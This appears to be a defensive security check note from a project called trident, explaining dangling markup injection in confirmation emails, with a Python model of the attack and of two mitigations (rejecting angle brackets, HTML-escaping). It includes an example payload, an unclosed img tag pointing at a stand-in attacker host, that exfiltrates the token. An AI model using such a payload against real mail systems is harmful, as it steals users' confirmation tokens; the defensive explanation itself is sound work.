trident
Mail Check - Dangling Markup Injection in Confirmation Emails
For the emails we send out, make sure that no (valid) HTML can appear in them.
We send the body as plain text rather than HTML, but quite a few mail clients will render such a body as HTML anyway. That turns any user-controlled field we echo back (a display name, for instance) into a dangling markup injection vector: an unclosed tag such as <img src="https://attacker.example/? makes a lenient renderer treat everything up to the next '"' or '>' as part of the image URL, so the rest of the message, confirmation link and token included, is sent to the attacker's server when the client fetches the image. No script execution is needed for this, so content security measures aimed at XSS do not help.
Thus at minimum we should never allow '<' and '>' in any field that we render into an email, so that no HTML tag can be formed. Rejecting them when the field is set is the simplest check; HTML-escaping the field at render time is the defence-in-depth alternative, and also neutralises '"', which is what would otherwise terminate a dangling attribute.
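The following is an added example (not trident's own code) that models the attack and both mitigations on a constructed confirmation-mail template. The template, the attacker host attacker.invalid, the display-name payload and the token value are all made up for the illustration; the "lenient renderer" is a deliberately simplified model of a mail client that parses a plain-text body as HTML.

```python
import html
import re
from typing import Optional

# Constructed confirmation-mail template. `display_name` is user-controlled;
# `token` is the secret the attacker wants to steal.
TEMPLATE = (
    "Hello {display_name},\n"
    "\n"
    "Please confirm your address by visiting:\n"
    "https://example.invalid/confirm?token={token}\n"
)


def contains_angle_brackets(value: str) -> bool:
    """Input-time check: reject any field that could open or close an HTML tag."""
    return "<" in value or ">" in value


def render_field(value: str) -> str:
    """Render-time alternative: HTML-escape the field so that a client which
    renders the plain-text body as HTML shows the characters literally.
    quote=True also escapes '"', the character that terminates a dangling
    attribute value."""
    return html.escape(value, quote=True)


def render_mail(display_name: str, token: str, escape: bool) -> str:
    """Build the mail body, with or without render-time escaping."""
    name = render_field(display_name) if escape else display_name
    return TEMPLATE.format(display_name=name, token=token)


def dangling_attribute_capture(body: str, attacker_host: str) -> Optional[str]:
    """Simplified model of a lenient HTML renderer: an <img src="..."> whose
    attribute value is never closed swallows the rest of the body up to the
    next '"'. Returns the URL the client would request from attacker_host
    (with the tab/CR/LF characters a URL parser strips), or None if no such
    tag survives in the body."""
    pattern = r'<img\s+src="(' + re.escape(attacker_host) + r'[^"]*)'
    match = re.search(pattern, body)
    if match is None:
        return None
    return re.sub(r"[\t\r\n]", "", match.group(1))


if __name__ == "__main__":
    # Constructed payload: an unclosed <img> tag in the display-name field.
    payload = 'Bob<img src="https://attacker.invalid/c?'
    print("rejected at input:", contains_angle_brackets(payload))
    leaked = dangling_attribute_capture(
        render_mail(payload, "tok123", escape=False), "https://attacker.invalid/"
    )
    print("leaked to attacker without escaping:", leaked)
    print(
        "leaked with escaping:",
        dangling_attribute_capture(
            render_mail(payload, "tok123", escape=True), "https://attacker.invalid/"
        ),
    )
```

Without either mitigation the URL the client requests from attacker.invalid contains the whole remainder of the mail, confirmation token included; with input rejection the mail is never built, and with escaping the tag is rendered as text and nothing is requested.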
See amongst others:
http://lcamtuf.coredump.cx/postxss/ (lcamtuf, "Postcards from the post-XSS world": the dangling markup technique)
https://thehackerblog.com/keeping-positive-obtaining-arbitrary-wildcard-ssl-certificates-from-comodo-via-dangling-markup-injection/index.html (the same technique used against Comodo's confirmation emails to obtain wildcard certificates)